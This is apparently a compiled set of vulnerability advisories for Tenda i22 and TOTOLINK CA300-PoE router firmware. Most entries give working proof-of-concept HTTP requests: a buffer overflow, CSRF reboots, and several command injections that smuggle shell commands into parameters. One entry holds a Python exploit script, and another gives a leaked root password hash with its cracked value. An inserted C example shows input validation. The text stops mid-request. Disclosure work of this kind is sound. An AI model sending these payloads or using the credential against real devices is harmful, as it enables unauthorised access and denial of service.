https://raw.githubusercontent.com/Double-q1015/CVE-vulns/d26cda5752a3da611eb0375468b332b381ab8866/tenda_i22/formwrlSSIDget/images/03.png -------------------------------------------------------------------------------- /tenda_i22/formwrlSSIDset/formwrlSSIDset.md: -------------------------------------------------------------------------------- 1 | # Tenda i22 V1.0.0.3(4687) was discovered to contain a buffer overflow via the list parameter in the formwrlSSIDset function. 2 | 3 | ## Description 4 | 5 | `Tenda` Router **i22 V1.0.0.3(4687)** was discovered to contain a buffer overflow in the `httpd` module when handling `/goform/wifiSSIDset` request. 
## Firmware information

* Manufacturer's address: https://www.tenda.com.cn/

* Firmware download address: https://www.tenda.com.cn/download/detail-2747.html

## Affected version

![image-20221120101953226](images/01.png)

## Vulnerability details

This vulnerability lies in the `/goform/wifiSSIDset` page. The details are shown below:

![image-20221120152918198](images/02.png)

## POC

This POC can result in a DoS.

```
POST /goform/wifiSSIDset HTTP/1.1
Host: 192.168.204.133
Content-Length: 2068
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://192.168.204.133
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.134 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://192.168.204.133/system_hostname.asp?version=1487847846
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: bLanguage=cn; password=jbl1qw; user=
Connection: close

wl_radio=0&index=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
```

![image-20221120113929418](images/03.png)

--------------------------------------------------------------------------------
/tenda_i22/fromSysToolReboot/fromSysToolReboot.md:
--------------------------------------------------------------------------------

# Tenda i22 V1.0.0.3(4687) is vulnerable to Cross Site Request Forgery (CSRF) via function fromSysToolReboot

## Description

`Tenda` Router **i22 V1.0.0.3(4687)** is vulnerable to Cross Site Request Forgery (CSRF) via function `fromSysToolReboot`.

## Firmware information

* Manufacturer's address: https://www.tenda.com.cn/

* Firmware download address: https://www.tenda.com.cn/download/detail-2747.html

## Affected version

![image-20221120101953226](images/01.png)

## Vulnerability details

This vulnerability lies in the `/goform/SysToolReboot` page. The details are shown below:

![image-20221120141002113](images/02.png)

![image-20221120141103919](images/04.png)

It allows remote attackers to reboot the device and cause denial of service via a payload hosted by an attacker-controlled web page.

## POC

This POC can result in a DoS.

```
GET /goform/SysToolReboot HTTP/1.1
Host: 192.168.204.133
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.134 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: bLanguage=cn; user=; password=vlz1qw
Connection: close


```

![image-20221121105432590](images/03.png)
--------------------------------------------------------------------------------
/tenda_i22/fromSysToolRestoreSet/fromSysToolRestoreSet.md:
--------------------------------------------------------------------------------

# Tenda i22 V1.0.0.3(4687) is vulnerable to Cross Site Request Forgery (CSRF) via function fromSysToolRestoreSet

## Description

`Tenda` Router **i22 V1.0.0.3(4687)** is vulnerable to Cross Site Request Forgery (CSRF) via function `fromSysToolRestoreSet`.

## Firmware information

* Manufacturer's address: https://www.tenda.com.cn/

* Firmware download address: https://www.tenda.com.cn/download/detail-2747.html

## Affected version

![image-20221120101953226](images/01.png)

## Vulnerability details

This vulnerability lies in the `/goform/SysToolRestoreSet` page. The details are shown below:

![image-20221120142340526](images/02.png)

![image-20221120142412727](images/04.png)

It allows remote attackers to reboot the device and cause denial of service via a payload hosted by an attacker-controlled web page.

## POC

This POC can result in a DoS.

```
GET /goform/SysToolRestoreSet HTTP/1.1
Host: 192.168.204.133
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.134 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: bLanguage=cn; password=jbl1qw; user=
Connection: close


```

![image-20221120142509445](images/03.png)
--------------------------------------------------------------------------------
/totolink_ca300-poe/NTPSyncWithHost/NTPSyncWithHost.md:
--------------------------------------------------------------------------------

# TOTOLINK CA300-PoE V6.2c.884 was discovered to contain a command injection vulnerability via the host_time parameter in the function NTPSyncWithHost

## Description

`TOTOLINK` Router **CA300-PoE V6.2c.884** was found to contain a command injection vulnerability in `NTPSyncWithHost`.

![image-20230112103759214](images/1.png)

## Firmware information

* Manufacturer's address: https://www.totolink.net/
* Firmware download address: https://www.totolink.net/home/menu/detail/menu_listtpl/download/id/139/ids/36.html

## Affected version

**Version: V6.2c.884**

![image-20230112103905821](images/2.png)

## Vulnerability details

POC:

```
POST /cgi-bin/cstecgi.cgi HTTP/1.1
Host: 192.168.0.254
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:108.0) Gecko/20100101 Firefox/108.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 100
Origin: http://192.168.0.254
Connection: keep-alive
Referer: http://192.168.0.254/adm/network_daig.asp?timestamp=1673492576260
Cookie: SESSION_ID=2:1673492439:2

{"topicurl":"NTPSyncWithHost", "host_time":"2022-01-01 20:12:43';mkdir /test9999;'"}
```

![image-20230112164910582](images/3.png)

![image-20230112165037971](images/4.png)

Folder created successfully.

![image-20230112165248306](images/5.png)
--------------------------------------------------------------------------------
/totolink_ca300-poe/root_hard_code/root_hard_code.md:
--------------------------------------------------------------------------------

# TOTOLINK CA300-PoE V6.2c.884 was discovered to contain a hard code password for root stored in the component /etc/shadow.

## Description

There is a hard-coded password for root in /etc/shadow.

![image-20230112103759214](images/1.png)

## Firmware information

* Manufacturer's address: https://www.totolink.net/
* Firmware download address: https://www.totolink.net/home/menu/detail/menu_listtpl/download/id/139/ids/36.html

## Affected version

**Version: V6.2c.884**

![image-20230112103905821](images/2.png)

## Vulnerability details

![image-20230113113147644](images/3.png)

```
root:$1$ArDex.Yh$J4iv2K7mBpSnHewlCdkdp.:0:0:99999:7:::
daemon:*:0:0:99999:7:::
admin:$1$zGWRVM14$u/x/W8yls/LouMLrunwbL/:0:0:99999:7:::
ftp:*:0:0:99999:7:::
network:*:0:0:99999:7:::
nobody:*:0:0:99999:7:::
```

![image-20230113124921819](images/4.png)

After cracking the password hash we got `cs2012`.
--------------------------------------------------------------------------------
/totolink_ca300-poe/setNetworkDiag_NetDiagHost/setNetworkDiag_NetDiagHost.md:
--------------------------------------------------------------------------------

# TOTOLINK CA300-PoE V6.2c.884 was discovered to contain a command injection vulnerability via the NetDiagHost parameter in the function setNetworkDiag

## Description

`TOTOLINK` Router **CA300-PoE V6.2c.884** was found to contain a command injection vulnerability in `setNetworkDiag`.

![image-20230112103759214](images/1.png)

## Firmware information

* Manufacturer's address: https://www.totolink.net/
* Firmware download address: https://www.totolink.net/home/menu/detail/menu_listtpl/download/id/139/ids/36.html

## Affected version

**Version: V6.2c.884**

![image-20230112103905821](images/2.png)

## Vulnerability details

POC1:

```
POST /cgi-bin/cstecgi.cgi HTTP/1.1
Host: 192.168.0.254
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:108.0) Gecko/20100101 Firefox/108.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 100
Origin: http://192.168.0.254
Connection: keep-alive
Referer: http://192.168.0.254/adm/network_daig.asp?timestamp=1673492576260
Cookie: SESSION_ID=2:1673492439:2

{"topicurl":"setting/setNetworkDiag","NetDiagMethod":"0","NetDiagHost":"www.baidu.com|expr 50 - 3;"}
```

![image-20230112110403648](images/3.png)

POC2:

```
import requests

url = "http://192.168.0.254:80/cgi-bin/cstecgi.cgi"
# requests' cookies= expects {cookie_name: value}; giving the session as
# SESSION_ID -> value sends the same "Cookie: SESSION_ID=..." header as POC1.
cookie = {"SESSION_ID": "2:1672999258:2"}

# Left over from the setDiagnosisCfg test; not sent below.
data = {"topicurl": "setDiagnosisCfg",
        "ip": "192.168.1.1||mkdir /test1111;"}

# Step 1: setNetworkDiag stores NetDiagHost in the corresponding variable.
data1 = {"topicurl": "setting/setNetworkDiag", "NetDiagMethod": "0",
         "NetDiagHost": "www.baidu.com|echo `ls`;"}
response = requests.post(url, cookies=cookie, json=data1)
print(response.text)
print(response)

# Step 2: showNetworkDiag -> getDiagInfo uses the stored value, and the
# command output comes back in the response.
data2 = {"topicurl": "setting/showNetworkDiag"}
response = requests.post(url, cookies=cookie, json=data2)
print(response.text)
print(response)
```

![image-20230112151607217](images/4.png)

The function `setNetworkDiag` is used to set the corresponding variable:

![image-20230112182605470](images/5.png)

In function `showNetworkDiag`:

![image-20230112182702672](images/6.png)

Step into function `getDiagInfo`:

![image-20230112182800857](images/7.png)
--------------------------------------------------------------------------------
/totolink_ca300-poe/setNetworkDiag_NetDiagPingNum/setNetworkDiag_NetDiagPingNum.md:
--------------------------------------------------------------------------------

# TOTOLINK CA300-PoE V6.2c.884 was discovered to contain a command injection vulnerability via the NetDiagPingNum parameter in the function setNetworkDiag

## Description

`TOTOLINK` Router **CA300-PoE V6.2c.884** was found to contain a command injection vulnerability in `setNetworkDiag`.

![image-20230112103759214](images/1.png)

## Firmware information

* Manufacturer's address: https://www.totolink.net/
* Firmware download address: https://www.totolink.net/home/menu/detail/menu_listtpl/download/id/139/ids/36.html

## Affected version

**Version: V6.2c.884**

![image-20230112103905821](images/2.png)

## Vulnerability details

POC1:

```
POST /cgi-bin/cstecgi.cgi HTTP/1.1
Host: 192.168.0.254
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:108.0) Gecko/20100101 Firefox/108.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 100
Origin: http://192.168.0.254
Connection: keep-alive
Referer: http://192.168.0.254/adm/network_daig.asp?timestamp=1673492576260
Cookie: SESSION_ID=2:1673492439:2

{"topicurl" :"setting/setNetworkDiag","NetDiagMethod" : "0", "NetDiagPingNum": "4||ls;"}
```

![image-20230112184654180](images/3.png)

The function `setNetworkDiag` is used to set the corresponding variable:

![image-20230112182605470](images/5.png)

In function `showNetworkDiag`:

![image-20230112182702672](images/6.png)

Step into function `getDiagInfo`:

![image-20230112182800857](images/7.png)
--------------------------------------------------------------------------------
/totolink_ca300-poe/setNetworkDiag_NetDiagPingSize/setNetworkDiag_NetDiagPingSize.md:
--------------------------------------------------------------------------------

# TOTOLINK CA300-PoE V6.2c.884 was discovered to contain a command injection vulnerability via the NetDiagPingSize parameter in the function setNetworkDiag

## Description

`TOTOLINK` Router **CA300-PoE V6.2c.884** was found to contain a command injection vulnerability in `setNetworkDiag`.

![image-20230112103759214](images/1.png)

## Firmware information

* Manufacturer's address: https://www.totolink.net/
* Firmware download address: https://www.totolink.net/home/menu/detail/menu_listtpl/download/id/139/ids/36.html

## Affected version

**Version: V6.2c.884**

![image-20230112103905821](images/2.png)

## Vulnerability details

POC1:

```
POST /cgi-bin/cstecgi.cgi HTTP/1.1
Host: 192.168.0.254
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:108.0) Gecko/20100101 Firefox/108.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 100
Origin: http://192.168.0.254
Connection: keep-alive
Referer: http://192.168.0.254/adm/network_daig.asp?timestamp=1673492576260
Cookie: SESSION_ID=2:1673492439:2

{"topicurl" :"setting/setNetworkDiag","NetDiagMethod" : "0", "NetDiagPingSize": "100||ls;"}
```

![image-20230112185124300](images/3.png)

The function `setNetworkDiag` is used to set the corresponding variable:

![image-20230112182605470](images/5.png)

In function `showNetworkDiag`:

![image-20230112182702672](images/6.png)

Step into function `getDiagInfo`:

![image-20230112182800857](images/7.png)
--------------------------------------------------------------------------------
/totolink_ca300-poe/setNetworkDiag_NetDiagPingTimeOut/setNetworkDiag_NetDiagPingTimeOut.md:
--------------------------------------------------------------------------------
# TOTOLINK CA300-PoE V6.2c.884 was discovered to contain a command injection vulnerability via the NetDiagPingTimeOut parameter in the function setNetworkDiag

## Description

The `TOTOLINK` router **CA300-PoE V6.2c.884** was found to contain a command injection vulnerability in `setNetworkDiag`.

![image-20230112103759214](images/1.png)

## Firmware information

* Manufacturer's address: https://www.totolink.net/
* Firmware download address: https://www.totolink.net/home/menu/detail/menu_listtpl/download/id/139/ids/36.html

## Affected version

**Version: V6.2c.884**

![image-20230112103905821](images/2.png)

## Vulnerability details

PoC 1:

```
POST /cgi-bin/cstecgi.cgi HTTP/1.1
Host: 192.168.0.254
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:108.0) Gecko/20100101 Firefox/108.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 100
Origin: http://192.168.0.254
Connection: keep-alive
Referer: http://192.168.0.254/adm/network_daig.asp?timestamp=1673492576260
Cookie: SESSION_ID=2:1673492439:2

{"topicurl" :"setting/setNetworkDiag","NetDiagMethod" : "0", "NetDiagPingTimeOut": "4||ls;"}
```

![image-20230112184654180](images/3.png)

The function `setNetworkDiag` is used to set the corresponding variable:

![image-20230112182605470](images/5.png)

In the function `showNetworkDiag`:

![image-20230112182702672](images/6.png)

Stepping into the function `getDiagInfo`:

![image-20230112182800857](images/7.png)
--------------------------------------------------------------------------------
/totolink_ca300-poe/setNetworkDiag_NetDiagTracertHop/setNetworkDiag_NetDiagTracertHop.md:
--------------------------------------------------------------------------------
# TOTOLINK CA300-PoE V6.2c.884 was discovered to contain a command injection vulnerability via the NetDiagTracertHop parameter in the function setNetworkDiag

## Description

The `TOTOLINK` router **CA300-PoE V6.2c.884** was found to contain a command injection vulnerability in `setNetworkDiag`.

![image-20230112103759214](images/1.png)

## Firmware information

* Manufacturer's address: https://www.totolink.net/
* Firmware download address: https://www.totolink.net/home/menu/detail/menu_listtpl/download/id/139/ids/36.html

## Affected version

**Version: V6.2c.884**

![image-20230112103905821](images/2.png)

## Vulnerability details

PoC 1:

```
POST /cgi-bin/cstecgi.cgi HTTP/1.1
Host: 192.168.0.254
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:108.0) Gecko/20100101 Firefox/108.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 100
Origin: http://192.168.0.254
Connection: keep-alive
Referer: http://192.168.0.254/adm/network_daig.asp?timestamp=1673492576260
Cookie: SESSION_ID=2:1673492439:2

{"topicurl" :"setting/setNetworkDiag","NetDiagMethod" : "1", "NetDiagTracertHop": "20||ls;"}
```

![image-20230112184654180](images/3.png)

The function `setNetworkDiag` is used to set the corresponding variable:

![image-20230112182605470](images/5.png)

In the function `showNetworkDiag`:

![image-20230112182702672](images/6.png)

Stepping into the function `getDiagInfo`, `V11` holds the value of `system.NetDiag.method`:

![image-20230112192218163](images/7.png)

![image-20230112192317035](images/8.png)
--------------------------------------------------------------------------------
/totolink_ca300-poe/setRebootScheCfg_hour/setRebootScheCfg_hour.md:
--------------------------------------------------------------------------------
# TOTOLINK CA300-PoE V6.2c.884 was discovered to contain a command injection vulnerability via the hour parameter in the function setRebootScheCfg

## Description

The `TOTOLINK` router **CA300-PoE V6.2c.884** was found to contain a command injection vulnerability in `setRebootScheCfg`.

![image-20230112103759214](images/1.png)

## Firmware information

* Manufacturer's address: https://www.totolink.net/
* Firmware download address: https://www.totolink.net/home/menu/detail/menu_listtpl/download/id/139/ids/36.html

## Affected version

**Version: V6.2c.884**

![image-20230112103905821](images/2.png)

## Vulnerability details

PoC 1:

```
POST /cgi-bin/cstecgi.cgi HTTP/1.1
Host: 192.168.0.254
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:108.0) Gecko/20100101 Firefox/108.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 100
Origin: http://192.168.0.254
Connection: keep-alive
Referer: http://192.168.0.254/adm/network_daig.asp?timestamp=1673492576260
Cookie: SESSION_ID=2:1673492439:2

{"topicurl" :"setting/setRebootScheCfg","mode" : "1", "hour": "';mkdir /hour_1111;'"}
```

The folder is created successfully:

![image-20230112223707387](images/3.png)

Decompiled `setRebootScheCfg`; the `hour` and `minute` values are taken from the request and pasted into a shell command line without any validation:

```
int __fastcall setRebootScheCfg(int a1, int a2, int a3)
{
  int mode_v; // $s5
  int week_v; // $s3
  const char *hour_v; // $fp
  const char *minute_v; // $s7
  int recHour_v; // $s0
  int v9; // $v0
  int v11; // $v0
  int i; // $s0
  _BYTE *v13; // $v0
  char *v14; // $a0
  int v15; // $s0
  int v16; // $s0
  char v19[256]; // [sp+2Ch] [-244h] BYREF
  char v20[128]; // [sp+12Ch] [-144h] BYREF
  char v21[128]; // [sp+1ACh] [-C4h] BYREF
  int v22[16]; // [sp+22Ch] [-44h] BYREF

  memset(v20, 0, sizeof(v20));
  memset(v21, 0, sizeof(v21));
  memset(v19, 0, sizeof(v19));
  mode_v = websGetVar(a2, "mode", "0");
  week_v = websGetVar(a2, "week", "");
  hour_v = (const char *)websGetVar(a2, "hour", "");     // request-controlled, never validated
  minute_v = (const char *)websGetVar(a2, "minute", ""); // request-controlled, never validated
  recHour_v = websGetVar(a2, "recHour", "0");
  cs_uci_set("system.reboot.mode", mode_v);
  cs_uci_set("system.reboot.week", week_v);
  cs_uci_set("system.reboot.hour", hour_v);
  cs_uci_set("system.reboot.minute", minute_v);
  cs_uci_set("system.reboot.recHour", recHour_v);
  cs_uci_commit("system");
  strcpy(v19, "sed -i /reboot/d /etc/crontabs/root");
  CsteSystem(v19, 0);
  CsteSystem("killall sche_reboot", 0);
  v9 = atoi(mode_v);
  if ( v9 == 1 ) // mode=1
  {
    v11 = atoi(week_v);
    if ( v11 == 255 )
    {
      strcpy(v21, "*");
    }
    else if ( v11 )
    {
      for ( i = 1; i != 8; ++i )
      {
        if ( ((atoi(week_v) >> i) & 1) != 0 )
        {
          sprintf(v20, (const char *)&dword_4404, i);
          strcat(v21, v20);
          strcat(v21, &dword_4408);
        }
      }
      v13 = (_BYTE *)strrchr(v21, 44);
      if ( v13 )
        *v13 = 0;
    }
    // injection sink: minute_v and hour_v become part of the shell command
    sprintf(v19, "echo '%s %s * * %s reboot -f'>> /etc/crontabs/root", minute_v, hour_v, v21);
    v14 = v19;
LABEL_13:
    CsteSystem(v14, 0);
    goto LABEL_3;
  }
  if ( v9 == 2 )
  {
    v15 = atoi(recHour_v);
    if ( v15 > 0 )
    {
      sysinfo(v22);
      v16 = 3600 * v15 - v22[0];
      if ( v16 <= 0 )
      {
        cs_cmd("reboot", 16464, 1);
        goto LABEL_3;
      }
      CsteSystem("killall sche_reboot", 0);
      sprintf(v20, "sche_reboot %ld &", v16);
      v14 = v20;
      goto LABEL_13;
    }
  }
LABEL_3:
  cs_cmd("/etc/init.d/cron", "restart", 2);
  websSetCfgResponse(a1, a3, "0", "reserv");
  return 0;
}
```

![image-20230112223054684](images/4.png)

![image-20230112223826938](images/5.png)
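Hardened counterpart of the `sprintf`/`CsteSystem` sequence in `setRebootScheCfg`, as an added example that is not the firmware's or the advisory's code: `minute`, `hour` and `week` are parsed as bounded integers and re-serialised before a cron line is built, and the line is appended with stdio instead of `echo ... >>` through a shell. The function names (`parse_bounded_int`, `build_week_field`, `reboot_cron_line`, `append_cron_line`) are this example's own; the same bounded-integer check is the fix for the numeric `NetDiagPingSize`, `NetDiagPingTimeOut` and `NetDiagTracertHop` parameters of `setNetworkDiag` in the advisories above, whose accepted ranges the page does not give.

```c
#include <errno.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Strictly parse s as a decimal integer in [lo, hi]: digits only, no sign,
 * no whitespace, no trailing characters. Returns 0 and stores the value,
 * or -1. Values such as "';mkdir /hour_1111;'" or "4||ls;" fail here and
 * therefore never reach a command string. */
int parse_bounded_int(const char *s, long lo, long hi, long *out)
{
    char *end;
    long v;

    if (s == NULL || *s == '\0' || strlen(s) > 10)
        return -1;
    for (const char *p = s; *p; p++)
        if (*p < '0' || *p > '9')
            return -1;
    errno = 0;
    v = strtol(s, &end, 10);
    if (errno != 0 || *end != '\0' || v < lo || v > hi)
        return -1;
    *out = v;
    return 0;
}

/* Build the cron day-of-week field the way the decompiled code does:
 * 255 means every day ("*"); otherwise bits 1..7 of the mask select
 * days 1..7. Returns -1 if no day is selected or out is too small. */
static int build_week_field(long mask, char *out, size_t outlen)
{
    size_t used = 0;

    if (mask == 255) {
        if (outlen < 2) return -1;
        strcpy(out, "*");
        return 0;
    }
    out[0] = '\0';
    for (int day = 1; day <= 7; day++) {
        if (((mask >> day) & 1) == 0) continue;
        int n = snprintf(out + used, outlen - used, "%s%d", used ? "," : "", day);
        if (n < 0 || (size_t)n >= outlen - used) return -1;
        used += (size_t)n;
    }
    return used ? 0 : -1;
}

/* Validated replacement for the vulnerable sprintf(): the line written to
 * the crontab can only contain digits, commas, '*' and the fixed
 * "reboot -f" text. Returns a pointer to a static buffer (overwritten by
 * the next call), or NULL when any field is rejected. */
const char *reboot_cron_line(const char *minute, const char *hour, const char *week)
{
    static char line[96];
    char days[32];
    long m, h, w;

    if (parse_bounded_int(minute, 0, 59, &m) != 0) return NULL;
    if (parse_bounded_int(hour, 0, 23, &h) != 0) return NULL;
    if (parse_bounded_int(week, 0, 255, &w) != 0) return NULL;
    if (build_week_field(w, days, sizeof days) != 0) return NULL;

    snprintf(line, sizeof line, "%ld %ld * * %s reboot -f", m, h, days);
    return line;
}

/* Append the validated line with stdio rather than "echo ... >>" in a
 * shell: with no shell involved, no metacharacter is ever interpreted.
 * crontab_path would be /etc/crontabs/root on the device. */
int append_cron_line(const char *crontab_path, const char *line)
{
    FILE *f = fopen(crontab_path, "a");
    if (f == NULL) return -1;
    int rc = (fprintf(f, "%s\n", line) < 0) ? -1 : 0;
    if (fclose(f) != 0) rc = -1;
    return rc;
}

int main(void)
{
    /* The hour value from the advisory's PoC is rejected before any command is built. */
    const char *poc_hour = "';mkdir /hour_1111;'";
    printf("PoC hour -> %s\n", reboot_cron_line("0", poc_hour, "255") ? "accepted" : "rejected");
    printf("valid    -> %s\n", reboot_cron_line("30", "4", "6"));
    return 0;
}
```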
--------------------------------------------------------------------------------
/totolink_ca300-poe/setUnloadUserData/setUnloadUserData.md:
--------------------------------------------------------------------------------
# TOTOLINK CA300-PoE V6.2c.884 was discovered to contain a command injection vulnerability via the plugin_version parameter in the function setUnloadUserData

## Description

The `TOTOLINK` router **CA300-PoE V6.2c.884** was found to contain a command injection vulnerability in `setUnloadUserData`.

![image-20230112103759214](images/1.png)

## Firmware information

* Manufacturer's address: https://www.totolink.net/
* Firmware download address: https://www.totolink.net/home/menu/detail/menu_listtpl/download/id/139/ids/36.html

## Affected version

**Version: V6.2c.884**

![image-20230112103905821](images/2.png)

## Vulnerability details

PoC 1:

```
POST /cgi-bin/cstecgi.cgi HTTP/1.1
Host: 192.168.0.254
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:108.0) Gecko/20100101 Firefox/108.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 100
Origin: http://192.168.0.254
Connection: keep-alive
Referer: http://192.168.0.254/adm/network_daig.asp?timestamp=1673492576260
Cookie: SESSION_ID=2:1673492439:2

{"topicurl" : "setting/setUnloadUserData", "plugin_version": "|mkdir /setUnloadUserData_2222;"}
```

The folder is created successfully:

![image-20230113110150511](images/3.png)

![image-20230113110232520](images/4.png)

![image-20230113125903358](images/5.png)
--------------------------------------------------------------------------------
/totolink_ca300-poe/setUploadUserData/setUploadUserData.md:
--------------------------------------------------------------------------------
# TOTOLINK CA300-PoE V6.2c.884 was discovered to contain a command injection vulnerability via the FileName parameter in the function setUploadUserData

## Description

The `TOTOLINK` router **CA300-PoE V6.2c.884** was found to contain a command injection vulnerability in `setUploadUserData`.

![image-20230112103759214](images/1.png)

## Firmware information

* Manufacturer's address: https://www.totolink.net/
* Firmware download address: https://www.totolink.net/home/menu/detail/menu_listtpl/download/id/139/ids/36.html

## Affected version

**Version: V6.2c.884**

![image-20230112103905821](images/2.png)

## Vulnerability details

PoC 1:

```
POST /cgi-bin/cstecgi.cgi HTTP/1.1
Host: 192.168.0.254
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:108.0) Gecko/20100101 Firefox/108.0
Accept: */*
